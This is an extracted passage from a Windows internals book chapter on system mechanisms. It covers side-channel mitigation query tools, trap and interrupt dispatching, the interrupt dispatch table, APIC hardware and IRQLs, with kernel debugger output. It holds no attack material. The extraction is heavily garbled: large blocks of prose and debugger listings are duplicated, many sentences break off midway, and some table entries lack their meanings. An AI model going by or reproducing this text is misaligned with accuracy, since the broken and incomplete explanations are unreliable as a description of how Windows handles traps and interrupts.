All of the three tools yield more or less the same results. Only the SkTool is able to show the
EXPERIMENT: Querying system side-channel mitigation status
Windows exposes side-channel mitigation information through the SystemSpeculationControl
Information and SystemSecureSpeculationControlInformation information classes used by the
NtQuerySystemInformation native API. Multiple tools exist that interface with this API and show
to the end user the system side-channel mitigation status:
I
supported by Microsoft, which is open source and available at the following GitHub
repository: https://github.com/microsoft/SpeculationControl
I
The SpecuCheck tool, developed by Alex Ionescu (one of the authors of this book),
which is open source and available at the following GitHub repository:
https://github.com/ionescu007/SpecuCheck
https://github.com/ionescu007/SpecuCheck
https://github.com/ionescu007/SpecuCheck
I
The SkTool, developed by Andrea Allievi (one of the authors of this book) and distributed
(at the time of this writing) in newer Insider releases of Windows.
All of the three tools yield more or less the same results. Only the SkTool is able to show the
CHAPTER 8 System mechanisms
29
mitigations have been enabled in your system. Download SpecuCheck and execute it by open-
ing a command prompt window (type cmd in the Cortana search box). You should get output like
the following:
SpecuCheck v1.1.1 -- Copyright(c) 2018 Alex Ionescu
https://ionescu007.github.io/SpecuCheck/ -- @aionescu
--------------------------------------------------------
Mitigations for CVE-2017-5754 [rogue data cache load]
--------------------------------------------------------
[-] Kernel VA Shadowing Enabled:
yes
> Unnecessary due lack of CPU vulnerability: no
> With User Pages Marked Global:
no
> With PCID Support:
yes
> With PCID Flushing Optimization (INVPCID): yes
Mitigations for CVE-2018-3620 [L1 terminal fault]
[-] L1TF Mitigation Enabled:
yes
> Unnecessary due lack of CPU vulnerability: no
> CPU Microcode Supports Data Cache Flush: yes
> With KVA Shadow and Invalid PTE Bit:
yes
(The output has been trimmed for space reasons.)
You can also download the latest Windows Insider release and try the SkTool. When launched
with no command-line arguments, by default the tool displays the status of the hypervisor and
with the /mitigations command-line argument:
Hypervisor / Secure Kernel / Secure Mitigations Parser Tool 1.0
Querying Speculation Features... Success!
This system supports Secure Speculation Controls.
System Speculation Features.
Enabled: 1
Hardware support: 1
IBRS Present: 1
STIBP Present: 1
SMEP Enabled: 1
Speculative Store Bypass Disable (SSBD) Available: 1
Speculative Store Bypass Disable (SSBD) Supported by OS: 1
Branch Predictor Buffer (BPB) flushed on Kernel/User transition: 1
Retpoline Enabled: 1
Import Optimization Enabled: 1
SystemGuard (Secure Launch) Enabled: 0 (Capable: 0)
SystemGuard SMM Protection (Intel PPAM / AMD SMI monitor) Enabled: 0
Secure system Speculation Features.
KVA Shadow supported: 1
KVA Shadow enabled: 1
KVA Shadow TLB flushing strategy: PCIDs
Minimum IBPB Hardware support: 0
IBRS Present: 0 (Enhanced IBRS: 0)
mitigations have been enabled in your system. Download SpecuCheck and execute it by open-
ing a command prompt window (type cmd in the Cortana search box). You should get output like
the following:
SpecuCheck v1.1.1 -- Copyright(c) 2018 Alex Ionescu
https://ionescu007.github.io/SpecuCheck/ -- @aionescu
--------------------------------------------------------
Mitigations for CVE-2017-5754 [rogue data cache load]
--------------------------------------------------------
[-] Kernel VA Shadowing Enabled:
yes
> Unnecessary due lack of CPU vulnerability: no
> With User Pages Marked Global:
no
> With PCID Support:
yes
> With PCID Flushing Optimization (INVPCID): yes
Mitigations for CVE-2018-3620 [L1 terminal fault]
[-] L1TF Mitigation Enabled:
yes
> Unnecessary due lack of CPU vulnerability: no
> CPU Microcode Supports Data Cache Flush: yes
> With KVA Shadow and Invalid PTE Bit:
yes
(The output has been trimmed for space reasons.)
You can also download the latest Windows Insider release and try the SkTool. When launched
with no command-line arguments, by default the tool displays the status of the hypervisor and
with the /mitigations command-line argument:
Hypervisor / Secure Kernel / Secure Mitigations Parser Tool 1.0
Querying Speculation Features... Success!
This system supports Secure Speculation Controls.
System Speculation Features.
Enabled: 1
Hardware support: 1
IBRS Present: 1
STIBP Present: 1
SMEP Enabled: 1
Speculative Store Bypass Disable (SSBD) Available: 1
Speculative Store Bypass Disable (SSBD) Supported by OS: 1
Branch Predictor Buffer (BPB) flushed on Kernel/User transition: 1
Retpoline Enabled: 1
Import Optimization Enabled: 1
SystemGuard (Secure Launch) Enabled: 0 (Capable: 0)
SystemGuard SMM Protection (Intel PPAM / AMD SMI monitor) Enabled: 0
Secure system Speculation Features.
KVA Shadow supported: 1
KVA Shadow enabled: 1
KVA Shadow TLB flushing strategy: PCIDs
Minimum IBPB Hardware support: 0
IBRS Present: 0 (Enhanced IBRS: 0)
30
CHAPTER 8 System mechanisms
STIBP Present: 0
SSBD Available: 0 (Required: 0)
Branch Predictor Buffer (BPB) flushed on Kernel/User transition: 0
Branch Predictor Buffer (BPB) flushed on User/Kernel and VTL 1 transition: 0
L1TF mitigation: 0
Microarchitectural Buffers clearing: 1
Trap dispatching
Interrupts and exceptions are operating system conditions that divert the processor to code outside
trap refers to a
control to a trap handler
illustrates some of the conditions that activate trap handlers.
The kernel distinguishes between interrupts and exceptions in the following way. An interrupt is an
asynchronous event (one that can occur at any time) that is typically unrelated to what the processor is
executing. Interrupts are generated primarily by I/O devices, processor clocks, or timers, and they can
be enabled (turned on) or disabled (turned off). An exception, in contrast, is a synchronous condition
Aborts, such as machine checks, are
-
tions and aborts are sometimes called faults, such as when talking about a page fault or a double fault.
Running a program for a second time with the same data under the same conditions can reproduce
exceptions. Examples of exceptions include memory-access violations, certain debugger instructions,
and divide-by-zero errors. The kernel also regards system service calls as exceptions (although techni-
Trap handlers
Interrupt
Interrupt
service
routines
Interrupt
service
routines
Interrupt
service
routines
System service call
Interrupt
service
routines
Interrupt
service
routines
System
services
Virtual address
exceptions
Interrupt
service
routines
Interrupt
service
routines
Virtual memory
manager’s
pager
Interrupt
service
routines
Interrupt
service
routines
Exception
handlers
Hardware exceptions
Software exceptions
Exception
dispatcher
(Exception
frame)
FIGURE 8-11 Trap dispatching.
STIBP Present: 0
SSBD Available: 0 (Required: 0)
Branch Predictor Buffer (BPB) flushed on Kernel/User transition: 0
Branch Predictor Buffer (BPB) flushed on User/Kernel and VTL 1 transition: 0
L1TF mitigation: 0
Microarchitectural Buffers clearing: 1
CHAPTER 8 System mechanisms
31
-
tion is caused by a hardware problem, whereas a divide-by-zero exception is the result of a software
bug. Likewise, an I/O device can generate an interrupt, or the kernel itself can issue a software interrupt
(such as an APC or DPC, both of which are described later in this chapter).
current Code Segment (CS) is in CPL 0 or below (i.e., if the current thread was running in kernel mode or
user mode). In the case where the thread was already running in Ring 0, the processor saves (or pushes)
on the current stack the following information, which represents a kernel-to-kernel transition.
I
I
The current code segment (CS)
I
The current program counter (EIP/RIP)
I
Optionally, for certain kind of exceptions, an error code
looks up the current TSS based on the Task Register (TR) and switches to the SS0/ESP0 on x86 or simply
RSP0 on x64, as described in the “Task state segments” section earlier in this chapter. Now that the pro-
cessor is executing on the kernel stack, it saves the previous SS (the user-mode value) and the previous
had happened. Second, it allows the operating system to know (based on the saved CS value) where
the trap came from—for example, to know if an exception came from user-mode code or from a
kernel system call.
machine state—including registers such as EAX, EBX, ECX, EDI, and so on is saved in a trap frame, a
data structure allocated by Windows in the thread's kernel stack. The trap frame stores the execution
dt nt!_KTRAP_FRAME command in the kernel debugger, or,
Part 1.) The kernel handles software interrupts either as part of hardware interrupt handling or synchro-
nously when a thread invokes kernel functions related to the software interrupt.
In most cases, the kernel installs front-end, trap-handling functions that perform general trap-
if the condition was a device interrupt, a kernel hardware interrupt trap handler transfers control to the
interrupt service routine (ISR) that the device driver provided for the interrupting device. If the condition
was caused by a call to a system service, the general system service trap handler transfers control to the
handle. These are sometimes called spurious or unexpected traps. The trap handlers typically execute
32
CHAPTER 8 System mechanisms
the system function KeBugCheckEx, which halts the computer when the kernel detects problematic
or incorrect behavior that, if left unchecked, could result in data corruption. The following sections
describe interrupt, exception, and system service dispatching in greater detail.
Interrupt dispatching
Hardware-generated interrupts typically originate from I/O devices that must notify the processor
when they need service. Interrupt-driven devices allow the operating system to get the maximum
use out of the processor by overlapping central processing with I/O operations. A thread starts an I/O
transfer to or from a device and then can execute other useful work while the device completes the
keyboards, disk drives, and network cards are generally interrupt driven.
to initiate thread dispatching and to break into the execution of a thread asynchronously. The kernel can
The kernel installs interrupt trap handlers to respond to device interrupts. Interrupt trap handlers
transfer control either to an external routine (the ISR) that handles the interrupt or to an internal kernel
routine that responds to the interrupt. Device drivers supply ISRs to service device interrupts, and the
kernel provides interrupt-handling routines for other types of interrupts.
-
rupts, the types of interrupts the kernel supports, how device drivers interact with the kernel (as a part
of interrupt processing), and the software interrupts the kernel recognizes (plus the kernel objects that
are used to implement them).
Hardware interrupt processing
On the hardware platforms supported by Windows, external I/O interrupts come into one of the inputs
on an interrupt controller, for example an I/O Advanced Programmable Interrupt Controller (IOAPIC).
Controllers (LAPIC), which ultimately interrupt the processor on a single input line.
Once the processor is interrupted, it queries the controller to get the global system interrupt vector
(GSIV), which is sometimes represented as an interrupt request (IRQ) number. The interrupt controller
translates the GSIV to a processor interrupt vector, which is then used as an index into a data structure
called the interrupt dispatch table
the matching IDT entry for the interrupt vector.
Based on the information in the IDT entry, the processor can transfer control to an appropriate inter-
rupt dispatch routine running in Ring 0 (following the process described at the start of this section), or
it can even load a new TSS and update the Task Register (TR), using a process called an interrupt gate.
CHAPTER 8 System mechanisms
33
kernel and HAL routines for each exception and internally handled interrupt, as well as with pointers to
thunk
interrupt vectors 0–31 are marked as reserved for processor traps, which are described in Table 8-3.
TABLE 8-3 Processor traps
Vector (Mnemonic)
Meaning
0 (#DE)
Divide error
1 (#DB)
Debug trap
2 (NMI)
Nonmaskable interrupt
3 (#BP)
Breakpoint trap
4 (#OF)
5 (#BR)
Bound fault
6 (#UD)
7 (#NM)
8 (#DF)
Double fault
9 (#MF)
Coprocessor fault (no longer used)
10 (#TS)
TSS fault
11 (#NP)
Segment fault
12 (#SS)
Stack fault
13 (#GP)
General protection fault
14 (#PF)
Page fault
15
Reserved
16 (#MF)
17 (#AC)
Alignment check fault
18 (#MC)
Machine check abort
19 (#XM)
SIMD fault
20 (#VE)
Virtualization exception
21 (#CP)
Control protection exception
22-31
Reserved
The remainder of the IDT entries are based on a combination of hardcoded values (for example,
vectors 30 to 34 are always used for Hyper-V-related VMBus interrupts) as well as negotiated values
example, a keyboard controller might send interrupt vector 82 on one particular Windows system and
67 on a different one.
34
CHAPTER 8 System mechanisms
EXPERIMENT: Viewing the 64-bit IDT
You can view the contents of the IDT, including information on what trap handlers Windows has
assigned to interrupts (including exceptions and IRQs), using the !idt kernel debugger command.
The !idt
interrupts (and, on 64-bit machines, the processor trap handlers).
The following example shows what the output of the !idt command looks like on an x64 system:
0: kd> !idt
Dumping IDT: fffff8027074c000
00: fffff8026e1bc700 nt!KiDivideErrorFault
01: fffff8026e1bca00 nt!KiDebugTrapOrFault Stack = 0xFFFFF8027076E000
02: fffff8026e1bcec0 nt!KiNmiInterrupt
Stack = 0xFFFFF8027076A000
03: fffff8026e1bd380 nt!KiBreakpointTrap
04: fffff8026e1bd680 nt!KiOverflowTrap
05: fffff8026e1bd980 nt!KiBoundFault
06: fffff8026e1bde80 nt!KiInvalidOpcodeFault
07: fffff8026e1be340 nt!KiNpxNotAvailableFault
08: fffff8026e1be600 nt!KiDoubleFaultAbort Stack = 0xFFFFF80270768000
09: fffff8026e1be8c0 nt!KiNpxSegmentOverrunAbort
0a: fffff8026e1beb80 nt!KiInvalidTssFault
0b: fffff8026e1bee40 nt!KiSegmentNotPresentFault
0c: fffff8026e1bf1c0 nt!KiStackFault
0d: fffff8026e1bf500 nt!KiGeneralProtectionFault
0e: fffff8026e1bf840 nt!KiPageFault
10: fffff8026e1bfe80 nt!KiFloatingErrorFault
11: fffff8026e1c0200 nt!KiAlignmentFault
12: fffff8026e1c0500 nt!KiMcheckAbort
Stack = 0xFFFFF8027076C000
13: fffff8026e1c0fc0 nt!KiXmmException
14: fffff8026e1c1380 nt!KiVirtualizationException
15: fffff8026e1c1840 nt!KiControlProtectionFault
1f: fffff8026e1b5f50 nt!KiApcInterrupt
20: fffff8026e1b7b00 nt!KiSwInterrupt
29: fffff8026e1c1d00 nt!KiRaiseSecurityCheckFailure
2c: fffff8026e1c2040 nt!KiRaiseAssertion
2d: fffff8026e1c2380 nt!KiDebugServiceTrap
2f: fffff8026e1b80a0 nt!KiDpcInterrupt
30: fffff8026e1b64d0 nt!KiHvInterrupt
31: fffff8026e1b67b0 nt!KiVmbusInterrupt0
32: fffff8026e1b6a90 nt!KiVmbusInterrupt1
33: fffff8026e1b6d70 nt!KiVmbusInterrupt2
34: fffff8026e1b7050 nt!KiVmbusInterrupt3
35: fffff8026e1b48b8 hal!HalpInterruptCmciService (KINTERRUPT fffff8026ea59fe0)
b0: fffff8026e1b4c90 ACPI!ACPIInterruptServiceRoutine (KINTERRUPT ffffb88062898dc0)
ce: fffff8026e1b4d80 hal!HalpIommuInterruptRoutine (KINTERRUPT fffff8026ea5a9e0)
d1: fffff8026e1b4d98 hal!HalpTimerClockInterrupt (KINTERRUPT fffff8026ea5a7e0)
d2: fffff8026e1b4da0 hal!HalpTimerClockIpiRoutine (KINTERRUPT fffff8026ea5a6e0)
d7: fffff8026e1b4dc8 hal!HalpInterruptRebootService (KINTERRUPT fffff8026ea5a4e0)
d8: fffff8026e1b4dd0 hal!HalpInterruptStubService (KINTERRUPT fffff8026ea5a2e0)
df: fffff8026e1b4e08 hal!HalpInterruptSpuriousService (KINTERRUPT fffff8026ea5a1e0)
e1: fffff8026e1b8570 nt!KiIpiInterrupt
e2: fffff8026e1b4e20 hal!HalpInterruptLocalErrorService (KINTERRUPT fffff8026ea5a3e0)
EXPERIMENT: Viewing the 64-bit IDT
You can view the contents of the IDT, including information on what trap handlers Windows has
assigned to interrupts (including exceptions and IRQs), using the !idt kernel debugger command.
The !idt
interrupts (and, on 64-bit machines, the processor trap handlers).
The following example shows what the output of the !idt command looks like on an x64 system:
0: kd> !idt
Dumping IDT: fffff8027074c000
00: fffff8026e1bc700 nt!KiDivideErrorFault
01: fffff8026e1bca00 nt!KiDebugTrapOrFault Stack = 0xFFFFF8027076E000
02: fffff8026e1bcec0 nt!KiNmiInterrupt
Stack = 0xFFFFF8027076A000
03: fffff8026e1bd380 nt!KiBreakpointTrap
04: fffff8026e1bd680 nt!KiOverflowTrap
05: fffff8026e1bd980 nt!KiBoundFault
06: fffff8026e1bde80 nt!KiInvalidOpcodeFault
07: fffff8026e1be340 nt!KiNpxNotAvailableFault
08: fffff8026e1be600 nt!KiDoubleFaultAbort Stack = 0xFFFFF80270768000
09: fffff8026e1be8c0 nt!KiNpxSegmentOverrunAbort
0a: fffff8026e1beb80 nt!KiInvalidTssFault
0b: fffff8026e1bee40 nt!KiSegmentNotPresentFault
0c: fffff8026e1bf1c0 nt!KiStackFault
0d: fffff8026e1bf500 nt!KiGeneralProtectionFault
0e: fffff8026e1bf840 nt!KiPageFault
10: fffff8026e1bfe80 nt!KiFloatingErrorFault
11: fffff8026e1c0200 nt!KiAlignmentFault
12: fffff8026e1c0500 nt!KiMcheckAbort
Stack = 0xFFFFF8027076C000
13: fffff8026e1c0fc0 nt!KiXmmException
14: fffff8026e1c1380 nt!KiVirtualizationException
15: fffff8026e1c1840 nt!KiControlProtectionFault
1f: fffff8026e1b5f50 nt!KiApcInterrupt
20: fffff8026e1b7b00 nt!KiSwInterrupt
29: fffff8026e1c1d00 nt!KiRaiseSecurityCheckFailure
2c: fffff8026e1c2040 nt!KiRaiseAssertion
2d: fffff8026e1c2380 nt!KiDebugServiceTrap
2f: fffff8026e1b80a0 nt!KiDpcInterrupt
30: fffff8026e1b64d0 nt!KiHvInterrupt
31: fffff8026e1b67b0 nt!KiVmbusInterrupt0
32: fffff8026e1b6a90 nt!KiVmbusInterrupt1
33: fffff8026e1b6d70 nt!KiVmbusInterrupt2
34: fffff8026e1b7050 nt!KiVmbusInterrupt3
35: fffff8026e1b48b8 hal!HalpInterruptCmciService (KINTERRUPT fffff8026ea59fe0)
b0: fffff8026e1b4c90 ACPI!ACPIInterruptServiceRoutine (KINTERRUPT ffffb88062898dc0)
ce: fffff8026e1b4d80 hal!HalpIommuInterruptRoutine (KINTERRUPT fffff8026ea5a9e0)
d1: fffff8026e1b4d98 hal!HalpTimerClockInterrupt (KINTERRUPT fffff8026ea5a7e0)
d2: fffff8026e1b4da0 hal!HalpTimerClockIpiRoutine (KINTERRUPT fffff8026ea5a6e0)
d7: fffff8026e1b4dc8 hal!HalpInterruptRebootService (KINTERRUPT fffff8026ea5a4e0)
d8: fffff8026e1b4dd0 hal!HalpInterruptStubService (KINTERRUPT fffff8026ea5a2e0)
df: fffff8026e1b4e08 hal!HalpInterruptSpuriousService (KINTERRUPT fffff8026ea5a1e0)
e1: fffff8026e1b8570 nt!KiIpiInterrupt
e2: fffff8026e1b4e20 hal!HalpInterruptLocalErrorService (KINTERRUPT fffff8026ea5a3e0)
CHAPTER 8 System mechanisms
35
e3: fffff8026e1b4e28 hal!HalpInterruptDeferredRecoveryService
(KINTERRUPT fffff8026ea5a0e0)
fd: fffff8026e1b4ef8 hal!HalpTimerProfileInterrupt (KINTERRUPT fffff8026ea5a8e0)
fe: fffff8026e1b4f00 hal!HalpPerfInterrupt (KINTERRUPT fffff8026ea5a5e0)
On the system used to provide the output for this experiment, the ACPI SCI ISR is at interrupt
number B0h. You can also see that interrupt 14 (0Eh) corresponds to KiPageFault, which is a type
pointer next to them. These correspond to the traps explained in the section on “Task state seg-
ments” from earlier, which require dedicated safe kernel stacks for processing. The debugger
knows these stack pointers by dumping the IDT entry, which you can do as well by using the dx
command and dereferencing one of the interrupt vectors in the IDT. Although you can obtain the
IdtBase.
0: kd> dx @$pcr->IdtBase[2].IstIndex
@$pcr->IdtBase[2].IstIndex : 0x3 [Type: unsigned short]
0: kd> dx @$pcr->IdtBase[0x12].IstIndex
@$pcr->IdtBase[0x12].IstIndex : 0x2 [Type: unsigned short]
If you compare the IDT Index values seen here with the previous experiment on dumping the
Each processor has a separate IDT (pointed to by their own IDTR) so that different processors can
clock interrupt, but only one processor updates the system clock in response to this interrupt. All the
processors, however, use the interrupt to measure thread quantum and to initiate rescheduling when a
handle certain device interrupts.
Programmable interrupt controller architecture
Traditional x86 systems relied on the i8259A Programmable Interrupt Controller (PIC), a standard that origi-
nated with the original IBM PC. The i8259A PIC worked only with uniprocessor systems and had only eight
second-
ary
Because PICs had such a quirky way of handling more than 8 devices, and because even 15 became a bottle-
neck, as well as due to various electrical issues (they were prone to spurious interrupts) and the limitations of
uniprocessor support, modern systems eventually phased out this type of interrupt controller, replacing it
with a variant called the i82489 Advanced Programmable Interrupt Controller (APIC).
e3: fffff8026e1b4e28 hal!HalpInterruptDeferredRecoveryService
(KINTERRUPT fffff8026ea5a0e0)
fd: fffff8026e1b4ef8 hal!HalpTimerProfileInterrupt (KINTERRUPT fffff8026ea5a8e0)
fe: fffff8026e1b4f00 hal!HalpPerfInterrupt (KINTERRUPT fffff8026ea5a5e0)
On the system used to provide the output for this experiment, the ACPI SCI ISR is at interrupt
number B0h. You can also see that interrupt 14 (0Eh) corresponds to KiPageFault, which is a type
KiPageFault, which is a type
KiPageFault
pointer next to them. These correspond to the traps explained in the section on “Task state seg-
ments” from earlier, which require dedicated safe kernel stacks for processing. The debugger
knows these stack pointers by dumping the IDT entry, which you can do as well by using the dx
command and dereferencing one of the interrupt vectors in the IDT. Although you can obtain the
IdtBase.
0: kd> dx @$pcr->IdtBase[2].IstIndex
@$pcr->IdtBase[2].IstIndex : 0x3 [Type: unsigned short]
0: kd> dx @$pcr->IdtBase[0x12].IstIndex
@$pcr->IdtBase[0x12].IstIndex : 0x2 [Type: unsigned short]
If you compare the IDT Index values seen here with the previous experiment on dumping the
36
CHAPTER 8 System mechanisms
APIC and the integration of both an I/O APIC (IOAPIC) connected to external hardware devices to a
Local APIC (LAPIC), connected to the processor core. With time, the MPS standard was folded into the
compatibility with uniprocessor operating systems and boot code that starts a multiprocessor system
in uniprocessor mode, APICs support a PIC compatibility mode with 15 interrupts and delivery of inter-
As mentioned, the APIC consists of several components: an I/O APIC that receives interrupts from
devices, local APICs that receive interrupts from the I/O APIC on the bus and that interrupt the CPU
they are associated with, and an i8259A-compatible interrupt controller that translates APIC input into
PIC-equivalent signals. Because there can be multiple I/O APICs on the system, motherboards typically
have a piece of core logic that sits between them and the processors. This logic is responsible for imple-
menting interrupt routing algorithms that both balance the device interrupt load across processors and
attempt to take advantage of locality, delivering device interrupts to the same processor that has just
the I/O APIC with its own routing logic to support various features such as interrupt steering, but device
Because the x64 architecture is compatible with x86 operating systems, x64 systems must provide
Windows refused to run on systems that did not have an APIC because they use the APIC for inter-
rupt control, whereas x86 versions of Windows supported both PIC and APIC hardware. This changed
with Windows 8 and later versions, which only run on APIC hardware regardless of CPU architecture.
this register to store the current software interrupt priority level (in the case of Windows, called the
IRQL) and to inform the IOAPIC when it makes routing decisions. More information on IRQL handling
will follow shortly.
Device
interrupts
i8259A-
equivalent
PIC
I/O
APIC
CPU 0
Processor Core
Local APIC
CPU 1
Processor Core
Local APIC
FIGURE 8-12 APIC architecture.
CHAPTER 8 System mechanisms
37
EXPERIMENT: Viewing the PIC and APIC
multiprocessor by using the !pic and !apic
output of the !pic command on a uniprocessor. Note that even on a system with an APIC, this
command still works because APIC systems always have an associated PIC-equivalent for emulat-
ing legacy hardware.
lkd> !pic
----- IRQ Number ----- 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
Physically in service: Y . . . . . . . . Y Y Y . . . .
Physically masked:
Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y
Physically requested: Y . . . . . . . . Y Y Y . . . .
Level Triggered:
. . . . . . . . . . . . . . . .
!apic command on a system running with Hyper-V enabled, which
you can see due to the presence of the SINTI
Controller (SynIC), described in Chapter 9. Note that during local kernel debugging, this com-
mand shows the APIC associated with the current processor—in other words, whichever proces-
at a crash dump or remote system, you can use the ~ (tilde) command followed by the processor
number to switch the processor of whose local APIC you want to see. In either case, the number
next to the ID: label will tell you which processor you are looking at.
lkd> !apic
Apic (x2Apic mode) ID:1 (50014) LogDesc:00000002 TPR 00
TimeCnt: 00000000clk SpurVec:df FaultVec:e2 error:0
Ipi Cmd: 00000000`0004001f Vec:1F FixedDel Dest=Self
edg high
Timer..: 00000000`000300d8 Vec:D8 FixedDel Dest=Self
edg high
m
Linti0.: 00000000`000100d8 Vec:D8 FixedDel Dest=Self
edg high
m
Linti1.: 00000000`00000400 Vec:00 NMI Dest=Self
edg high
Sinti0.: 00000000`00020030 Vec:30 FixedDel Dest=Self
edg high
Sinti1.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sinti2.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sinti3.: 00000000`000000d1 Vec:D1 FixedDel Dest=Self
edg high
Sinti4.: 00000000`00020030 Vec:30 FixedDel Dest=Self
edg high
Sinti5.: 00000000`00020031 Vec:31 FixedDel Dest=Self
edg high
Sinti6.: 00000000`00020032 Vec:32 FixedDel Dest=Self
edg high
Sinti7.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sinti8.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sinti9.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintia.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintib.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintic.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintid.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintie.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintif.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
TMR: 95, A5, B0
IRR:
ISR:
EXPERIMENT: Viewing the PIC and APIC
multiprocessor by using the !pic and !apic
output of the !pic command on a uniprocessor. Note that even on a system with an APIC, this
command still works because APIC systems always have an associated PIC-equivalent for emulat-
ing legacy hardware.
lkd> !pic
----- IRQ Number ----- 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
Physically in service: Y . . . . . . . . Y Y Y . . . .
Physically masked:
Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y
Physically requested: Y . . . . . . . . Y Y Y . . . .
Level Triggered:
. . . . . . . . . . . . . . . .
!apic command on a system running with Hyper-V enabled, which
you can see due to the presence of the SINTI
Controller (SynIC), described in Chapter 9. Note that during local kernel debugging, this com-
mand shows the APIC associated with the current processor—in other words, whichever proces-
at a crash dump or remote system, you can use the ~ (tilde) command followed by the processor
number to switch the processor of whose local APIC you want to see. In either case, the number
next to the ID: label will tell you which processor you are looking at.
lkd> !apic
Apic (x2Apic mode) ID:1 (50014) LogDesc:00000002 TPR 00
TimeCnt: 00000000clk SpurVec:df FaultVec:e2 error:0
Ipi Cmd: 00000000`0004001f Vec:1F FixedDel Dest=Self
edg high
Timer..: 00000000`000300d8 Vec:D8 FixedDel Dest=Self
edg high
m
Linti0.: 00000000`000100d8 Vec:D8 FixedDel Dest=Self
edg high
m
Linti1.: 00000000`00000400 Vec:00 NMI Dest=Self
edg high
Sinti0.: 00000000`00020030 Vec:30 FixedDel Dest=Self
edg high
Sinti1.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sinti2.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sinti3.: 00000000`000000d1 Vec:D1 FixedDel Dest=Self
edg high
Sinti4.: 00000000`00020030 Vec:30 FixedDel Dest=Self
edg high
Sinti5.: 00000000`00020031 Vec:31 FixedDel Dest=Self
edg high
Sinti6.: 00000000`00020032 Vec:32 FixedDel Dest=Self
edg high
Sinti7.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sinti8.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sinti9.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintia.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintib.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintic.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintid.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintie.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
Sintif.: 00000000`00010000 Vec:00 FixedDel Dest=Self
edg high
m
TMR: 95, A5, B0
IRR:
ISR:
38
CHAPTER 8 System mechanisms
The various numbers following the Vec labels indicate the associated vector in the IDT with
Interrupt Processor Interrupt (IPI) vector, and interrupt number 0xE2 handles APIC errors. Going
back to the !idt
Interrupt (meaning that an IPI was recently used to send an APC from one processor to another),
The following output is for the !ioapic
IRQ 9 (the System Control Interrupt, or SCI) is associated with vector B0h, which in the !idt output
from the earlier experiment was associated with ACPI.SYS.
0: kd> !ioapic
Controller at 0xfffff7a8c0000898 I/O APIC at VA 0xfffff7a8c0012000
IoApic @ FEC00000 ID:8 (11) Arb:0
Inti00.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti01.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti02.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti03.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti04.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti05.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti06.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti07.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti08.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti09.: ff000000`000089b0 Vec:B0 LowestDl Lg:ff000000
lvl high
Inti0A.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti0B.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Software interrupt request levels (IRQLs)
Although interrupt controllers perform interrupt prioritization, Windows imposes its own interrupt
priority scheme known as interrupt request levels (IRQLs). The kernel represents IRQLs internally as a
number from 0 through 31 on x86 and from 0 to 15 on x64 (and ARM/ARM64), with higher numbers
Interrupts are serviced in priority order, and a higher-priority interrupt preempts the servicing of
a lower-priority interrupt. When a high-priority interrupt occurs, the processor saves the interrupted
-
saved machine state. The interrupted thread resumes executing where it left off. When the kernel low-
ers the IRQL, lower-priority interrupts that were masked might materialize. If this happens, the kernel
repeats the process to handle the new interrupts.
The various numbers following the Vec labels indicate the associated vector in the IDT with
Vec labels indicate the associated vector in the IDT with
Vec
Interrupt Processor Interrupt (IPI) vector, and interrupt number 0xE2 handles APIC errors. Going
back to the !idt
Interrupt (meaning that an IPI was recently used to send an APC from one processor to another),
The following output is for the !ioapic
IRQ 9 (the System Control Interrupt, or SCI) is associated with vector B0h, which in the !idt output
from the earlier experiment was associated with ACPI.SYS.
0: kd> !ioapic
Controller at 0xfffff7a8c0000898 I/O APIC at VA 0xfffff7a8c0012000
IoApic @ FEC00000 ID:8 (11) Arb:0
Inti00.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti01.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti02.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti03.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti04.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti05.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti06.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti07.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti08.: 00000000`000100ff Vec:FF FixedDel Ph:00000000
edg high
m
Inti09.: ff000000`000089b0 Vec:B0 LowestDl Lg:ff000000
